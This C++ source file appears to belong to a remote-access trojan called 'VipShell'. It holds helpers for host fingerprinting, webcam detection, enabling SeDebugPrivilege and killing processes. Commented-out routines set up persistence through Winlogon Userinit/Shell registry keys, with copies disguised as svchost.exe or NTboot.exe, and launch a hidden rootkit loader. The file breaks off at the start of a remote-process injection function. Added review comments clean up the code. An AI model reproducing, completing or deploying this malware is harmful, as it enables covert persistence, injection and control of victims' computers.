#include "tools.h"
#include "Vfw.h"
#include <TCHAR.H>
#include <TLHELP32.H>
#include <Wininet.h>
#pragma comment (lib, "Vfw32.lib")
#include <Psapi.h>
#pragma comment (lib, "Psapi.lib")
#pragma comment (lib, "Wininet")
#include <atlbase.h>
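/// @brief Reads the nominal clock speed (MHz) Windows recorded for processor 0.
/// @return The REG_DWORD "~MHz" value under
///         HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0, or 0 when the key
///         cannot be opened or the value is missing / not a DWORD. The original
///         ignored both registry results and returned an uninitialized DWORD on failure.
DWORD GetCpuInfo()
{
    HKEY hKey = NULL;
    const LONG lOpen = RegOpenKeyEx(HKEY_LOCAL_MACHINE,
        L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0",
        0, KEY_QUERY_VALUE, &hKey);
    if (lOpen != ERROR_SUCCESS)
        return 0;

    DWORD dwCpu = 0;
    DWORD dwBufLen = sizeof(dwCpu);
    DWORD dwType = REG_NONE;
    const LONG lQuery = RegQueryValueEx(hKey, L"~MHz", NULL, &dwType,
        reinterpret_cast<LPBYTE>(&dwCpu), &dwBufLen);
    RegCloseKey(hKey);

    // Only trust the buffer when the value really is a DWORD of the expected size;
    // a string or oversized value would otherwise be reinterpreted as a number.
    if (lQuery != ERROR_SUCCESS || dwType != REG_DWORD || dwBufLen != sizeof(dwCpu))
        return 0;
    return dwCpu;
}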
/// @brief Copies the running OS version numbers into the caller's variables.
/// @param dwMajorVersion  Receives OSVERSIONINFOEX::dwMajorVersion.
/// @param dwMinorVersion  Receives OSVERSIONINFOEX::dwMinorVersion.
/// @param dwPlatformId    Receives OSVERSIONINFOEX::dwPlatformId.
/// @return TRUE on success; FALSE if GetVersionEx fails, in which case the
///         out-parameters are left untouched.
/// @note GetVersionEx is documented as deprecated; on newer Windows the reported
///       version may depend on the application manifest — confirm before relying on it.
BOOL GetServerEdition(DWORD* dwMajorVersion, DWORD* dwMinorVersion, DWORD* dwPlatformId)
{
    OSVERSIONINFOEX versionInfo;
    versionInfo.dwOSVersionInfoSize = sizeof(versionInfo);

    // The EX structure is passed through the base-structure pointer type the API expects.
    const BOOL bQueried = GetVersionEx(reinterpret_cast<OSVERSIONINFO*>(&versionInfo));
    if (!bQueried)
        return FALSE;

    *dwMajorVersion = versionInfo.dwMajorVersion;
    *dwMinorVersion = versionInfo.dwMinorVersion;
    *dwPlatformId = versionInfo.dwPlatformId;
    return TRUE;
}
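/// @brief Returns the total physical memory in bytes, saturated to the DWORD range.
/// @return ullTotalPhys from GlobalMemoryStatusEx; MAXDWORD when the machine has more
///         than 4 GiB (a DWORD cannot represent it); 0 if the query fails.
///         The original used GlobalMemoryStatus, which is documented to report
///         incorrect values on systems with more than 4 GB of memory.
DWORD GetMemorySize()
{
    MEMORYSTATUSEX msex;
    msex.dwLength = sizeof(msex);   // required by GlobalMemoryStatusEx
    if (!GlobalMemoryStatusEx(&msex))
        return 0;
    if (msex.ullTotalPhys > MAXDWORD)
        return MAXDWORD;
    return static_cast<DWORD>(msex.ullTotalPhys);
}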
/// @brief Reports whether video-capture driver index 0 has a registered name,
///        i.e. whether a VFW capture device appears to be present.
/// @return true if capGetDriverDescription filled in a non-empty driver name.
bool IsCanCap()
{
    WCHAR driverName[256] = {};
    WCHAR driverVersion[256] = {};

    // NOTE(review): sizeof() passes the buffer sizes in bytes (512) for 256-WCHAR
    // arrays; confirm against the capGetDriverDescription documentation whether
    // cbName/cbVer are byte or character counts before relying on this.
    capGetDriverDescription(0, driverName, sizeof(driverName),
                            driverVersion, sizeof(driverVersion));

    return lstrlen(driverName) != 0;
}
/// @brief Looks for a top-level window of class "___GetCapWnd___" and, if found,
///        sends it WM_CLOSE followed by WM_DESTROY.
/// @return The handle that was found (it may no longer be valid once the messages
///         have been processed), or NULL if no such window exists.
/// @note The lookup is repeated up to 100 times with no delay between attempts,
///       so every attempt observes essentially the same window state; presumably
///       a retry-with-wait was intended — confirm with the author.
HWND FindCapWnd()
{
    const WCHAR* const kClassName = L"___GetCapWnd___";

    int attempt = 0;
    while (attempt < 100)
    {
        HWND hTarget = ::FindWindow(kClassName, NULL);
        if (hTarget != NULL)
        {
            SendMessage(hTarget, WM_CLOSE, 0, 0);
            // Sent directly rather than via DestroyWindow, as in the original.
            SendMessage(hTarget, WM_DESTROY, 0, 0);
            return hTarget;
        }
        ++attempt;
    }
    return NULL;
}
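/// @brief Enables SeDebugPrivilege on the current process token.
///
/// The privilege must already be present (disabled) in the token — normally only for
/// administrative accounts — so this call cannot grant a right the account lacks; it only
/// toggles an existing one. A process enabling SeDebugPrivilege is a common signal in
/// endpoint telemetry and is worth alerting on.
/// @return true only if the privilege was actually enabled. The original leaked hToken on
///         the success path and returned true even when AdjustTokenPrivileges succeeded
///         with GetLastError() == ERROR_NOT_ALL_ASSIGNED.
bool enableDebugPriv()
{
    HANDLE hToken = NULL;
    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
        return false;
    }

    LUID debugLuid;
    if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &debugLuid)) {
        CloseHandle(hToken);
        return false;
    }

    TOKEN_PRIVILEGES tkp;
    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Luid = debugLuid;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    const BOOL bAdjusted = AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL);
    // AdjustTokenPrivileges returns TRUE even when no privilege was assigned; the real
    // outcome is in GetLastError, which must be read before CloseHandle can overwrite it.
    const DWORD dwErr = GetLastError();
    CloseHandle(hToken);

    return bAdjusted && dwErr == ERROR_SUCCESS;
}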
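/// @brief Resolves the full image path of a process from its process id.
/// @param dwProcessId  Id of the target process.
/// @param szPath       Receives the NUL-terminated image path (or its directory, see isGetPath).
/// @param dwbufflen    Size of szPath in TCHARs — the unit GetModuleFileNameEx's nSize uses.
/// @param isGetPath    When true, the file name is cut off after the last '\\', leaving the
///                     directory with its trailing separator.
/// @return true on success; false if the arguments are invalid or the process cannot be
///         opened or queried. On failure szPath is not guaranteed to have been written.
///         The original ignored a failed GetModuleFileNameEx and then searched the
///         uninitialized buffer for '\\', dereferencing NULL when none was found.
bool GetProcessFilePath(DWORD dwProcessId, LPTSTR szPath, DWORD dwbufflen, bool isGetPath)
{
    if (szPath == NULL || dwbufflen == 0)
        return false;

    // Least privilege: EnumProcessModules / GetModuleFileNameEx only need query and
    // VM-read rights; PROCESS_ALL_ACCESS is far more than this read-only lookup requires.
    HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, dwProcessId);
    if (hProcess == NULL)
        return false;

    HMODULE hMainModule = NULL;
    DWORD cbNeeded = 0;
    // The first module returned is the process image.
    if (!EnumProcessModules(hProcess, &hMainModule, sizeof(hMainModule), &cbNeeded))
    {
        CloseHandle(hProcess);
        return false;
    }

    const DWORD dwCopied = GetModuleFileNameEx(hProcess, hMainModule, szPath, dwbufflen);
    CloseHandle(hProcess);
    if (dwCopied == 0)
        return false;

    if (isGetPath)
    {
        LPTSTR pLastSep = _tcsrchr(szPath, _T('\\'));
        // A path without a separator has no directory part to strip; leave it whole.
        if (pLastSep != NULL)
            *(pLastSep + 1) = 0;
    }
    return true;
}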
/// @brief Terminates the process with id dwProcessId using exit code 0.
/// @return TRUE when TerminateProcess reports success; FALSE (0) when the process
///         cannot be opened or the termination call fails.
BOOL KillProcess(DWORD dwProcessId)
{
    // NOTE(review): TerminateProcess documents PROCESS_TERMINATE as the required
    // access right; the broader PROCESS_ALL_ACCESS request is kept to preserve behavior.
    const HANDLE hTarget = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwProcessId);
    if (hTarget == NULL)
        return FALSE;

    const BOOL bTerminated = TerminateProcess(hTarget, 0);
    CloseHandle(hTarget);
    return bTerminated;
}
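/// @brief Finds the id of the first running process whose executable name matches
///        szName, compared case-insensitively against the snapshot's szExeFile.
/// @param szName  Executable name as it appears in the process list
///                (e.g. "notepad.exe", a constructed example); may be NULL.
/// @return The matching process id, or 0 if szName is NULL, the snapshot cannot be
///         taken, or nothing matches. The original checked neither
///         CreateToolhelp32Snapshot nor Process32First and, when the latter failed,
///         compared against an uninitialized PROCESSENTRY32.
DWORD GetProcessIdByName(LPCWSTR szName)
{
    if (szName == NULL)
        return 0;

    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE)
        return 0;

    DWORD dwRet = 0;
    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(pe32);   // required before Process32First
    if (Process32First(hSnapshot, &pe32))
    {
        do
        {
            if (_tcsicmp(pe32.szExeFile, szName) == 0)
            {
                dwRet = pe32.th32ProcessID;
                break;
            }
        } while (Process32Next(hSnapshot, &pe32));
    }

    CloseHandle(hSnapshot);
    return dwRet;
}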
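/// @brief Fills pVecTor with one tagVipShellProcess entry per process in a Toolhelp snapshot.
///
/// For each entry dwPid is set and cFileName receives the full image path when
/// GetProcessFilePath succeeds; otherwise the bare executable name from the snapshot
/// (pe32.szExeFile) is stored instead.
/// @param pVecTor  Output vector; cleared first. Must not be NULL.
/// @return Number of entries stored, or 0 if pVecTor is NULL or the snapshot fails.
///         The original checked neither CreateToolhelp32Snapshot nor Process32First,
///         passed a byte count where a character count is expected, and copied the
///         fallback name unbounded.
DWORD GetProcessToVecTor(std::vector<tagVipShellProcess>* pVecTor)
{
    if (pVecTor == NULL)
        return 0;
    pVecTor->clear();

    HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if (hSnapshot == INVALID_HANDLE_VALUE)
        return 0;

    PROCESSENTRY32 pe32;
    pe32.dwSize = sizeof(pe32);   // required before Process32First
    if (Process32First(hSnapshot, &pe32))
    {
        tagVipShellProcess Proc;
        // Length in TCHARs: both GetModuleFileNameEx's nSize and lstrcpyn's count are
        // character counts, whereas the original passed sizeof() (bytes).
        // Assumes cFileName is a TCHAR array declared in tools.h — confirm.
        const DWORD cchFileName =
            static_cast<DWORD>(sizeof(Proc.cFileName) / sizeof(Proc.cFileName[0]));
        do
        {
            memset(&Proc, 0, sizeof(Proc));
            Proc.dwPid = pe32.th32ProcessID;
            if (!GetProcessFilePath(Proc.dwPid, Proc.cFileName, cchFileName, false))
            {
                // Fall back to the snapshot's executable name, bounded to the field size.
                lstrcpyn(Proc.cFileName, pe32.szExeFile, cchFileName);
            }
            pVecTor->push_back(Proc);
        } while (Process32Next(hSnapshot, &pe32));
    }

    CloseHandle(hSnapshot);
    return static_cast<DWORD>(pVecTor->size());
}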
//bool GetVipShellConfig(LPCWSTR szFile, LPVIPSHELLCONFIG pCfg)
//{
// FILE* fp = _wfopen(szFile, _T("rb"));
// if( !fp )
// return false;
// long loffset = 0 - sizeof(VIPSHELLCONFIG);
// int nRet = fseek(fp, loffset, SEEK_END);
// if ( nRet != 0)
// {
// fclose(fp);
// return false;
// }
// fread(pCfg, 1, sizeof(VIPSHELLCONFIG), fp);
// fclose(fp);
// BYTE bByte;
// for(int i = 0 ; i < sizeof(VIPSHELLCONFIG); i++)
// {
// bByte = (BYTE)*((BYTE*)pCfg + i);
// bByte ++;
// (BYTE)*((BYTE*)pCfg + i) = bByte;
// // *(BYTE*)(pCfg + i) = bByte;
// }
// return true;
//}
//bool GetVipShellConfig(LPVIPSHELLCONFIG pCfg)
//{
// CStartAggregate hStart;
// VIPSHELLCONFIG vipcfg;
// WCHAR pExePath[MAX_PATH] ; GetExeFilePath(pExePath);
// bool bRet = GetVipShellConfig(pExePath, &vipcfg);
// if(!bRet)
// return false;
// std::wstring strCfgFile = hStart.m_strWindowsPath;
// strCfgFile += vipcfg.szCfgFile;
// VIPSHELLCONFIG vipcfgEx;
// bRet = GetVipShellConfig(strCfgFile.c_str(), &vipcfgEx);
// if( !bRet )
// {
// memcpy(pCfg, &vipcfg, sizeof(VIPSHELLCONFIG));
// return true;
// }
// bRet = SetVipShellConfig(strCfgFile.c_str(), &vipcfgEx);
// if(!bRet)
// return true;
// memcpy(pCfg, &vipcfgEx, sizeof(VIPSHELLCONFIG));
// return true;
//// MakeRun(hStart.m_strExePath.c_str(), vipcfgEx.szServerName);
//}
//
//bool SetVipShellConfig(LPCWSTR szFile, LPVIPSHELLCONFIG pCfg1)
//{
// VIPSHELLCONFIG tp;
// memcpy(&tp, pCfg1, sizeof(VIPSHELLCONFIG));
// LPVIPSHELLCONFIG pCfg =&tp;
// BYTE bByte;
// for(int i = 0 ; i < sizeof(VIPSHELLCONFIG); i++)
// {
// bByte = (BYTE)*((BYTE*)pCfg + i);
// bByte --;
// (BYTE)*((BYTE*)pCfg + i) = bByte;
// }
// FILE* fp = _wfopen(szFile, _T("wb"));
// if( !fp )
// return false;
// long loffset = 0 - sizeof(VIPSHELLCONFIG);
// int nRet = fseek(fp, loffset, SEEK_END);
//// if ( nRet != 0)
//// return false;
// fwrite(pCfg, 1, sizeof(VIPSHELLCONFIG), fp);
// fclose(fp);
// return true;
//}
//bool SetVipShellConfigExplain(LPCWSTR szEx)
//{
// VIPSHELLCONFIG Cfg;
// WCHAR pExePath[MAX_PATH] ; GetExeFilePath(pExePath);
// GetVipShellConfig(pExePath, &Cfg);
// lstrcpy(Cfg.szExplain, szEx);
//
// CStartAggregate hStart;
// std::wstring strCfgFile = hStart.m_strWindowsPath;
// strCfgFile += Cfg.szCfgFile;
//
// SetVipShellConfig(strCfgFile.c_str(), &Cfg);
// return true;
//}
//void MakeRun(LPCWSTR szFile, LPCWSTR szServerName, bool bIsRun)
//{
//
// if( szServerName == NULL)
// {
//
// VIPSHELLCONFIG vipcfgEx;
// bool bRet = GetVipShellConfig( &vipcfgEx);
// if(!bRet)
// return ;
// //return MakeRun(szFile, vipcfgEx.szServerName, bIsRun);
// }
//
////获取配置,如果不先获取配置信息,则将无法在之后使用 vipcfgEx.szExeName;
// VIPSHELLCONFIG vipcfgEx;
// GetVipShellConfig( &vipcfgEx);
////结束获取
// CStartAggregate hStart;
// hStart.m_strExePath = szFile;
// std::wstring strServerPath = hStart.m_strSystemPath;
// //strServerPath += vipcfgEx.szExeName;
//
//// strServerPath += L"NTboot.exe";
// //CopyFile(hStart.m_strExePath.c_str(), strServerPath.c_str(), FALSE);
// //hStart.CreateNtService(szServerName, strServerPath.c_str());
//
// //if(!bIsRun)
// //DeleteFile(strServerPath.c_str());
//
// //if(bIsRun)
// // hStart.SetCurrentVersionWinlogonUserinit(strServerPath.c_str());
// //else
// // hStart.SetCurrentVersionWinlogonUserinit(L"");
//
// //if(!bIsRun)
// //DeleteFile(strServerIe.c_str());
//
////启动项目创建完毕,执行加载程序,隐藏自身
// //WinExec("rk_loader.exe", SW_HIDE);
////启动项目创建完毕,执行加载程序,隐藏自身
//
///*
// std::wstring strServerLoad = hStart.m_strSystemPath;
// strServerLoad += L"Fixboot.exe";
// CopyFile(hStart.m_strExePath.c_str(), strServerLoad.c_str(), FALSE);
// if(bIsRun)
// hStart.SetCurrentWindowsLoad(strServerLoad.c_str());
// else
// hStart.SetCurrentWindowsLoad(L"");
// if(!bIsRun)
// DeleteFile(strServerLoad.c_str());
//
// std::wstring strServerIe = hStart.m_strIePath ;
// strServerIe += L"NTboot.exe";
// CopyFile(hStart.m_strExePath.c_str(), strServerIe.c_str(), FALSE);
// if(bIsRun)
// hStart.SetCurrentVersionWinlogonUserinit(strServerIe.c_str());
// else
// hStart.SetCurrentVersionWinlogonUserinit(L"");
// if(!bIsRun)
// DeleteFile(strServerIe.c_str());
//
// std::wstring strServerhelp = hStart.m_strWindowsPath;
// strServerhelp += L"svchost.exe";
// CopyFile(hStart.m_strExePath.c_str(), strServerhelp.c_str(), FALSE);
// if(bIsRun)
// hStart.SetCurrentVersionWinlogonShell(strServerhelp.c_str());
// else
// hStart.SetCurrentVersionWinlogonShell(L"");
// if(!bIsRun)
// DeleteFile(strServerhelp.c_str());
//
//*/
//}
DWORD InjectRemote
(
HANDLE hProcess,
//DWORD PID,
void* pfnRemoteFunc,
DWORD dwFuncSize,
void* pRemoteParam,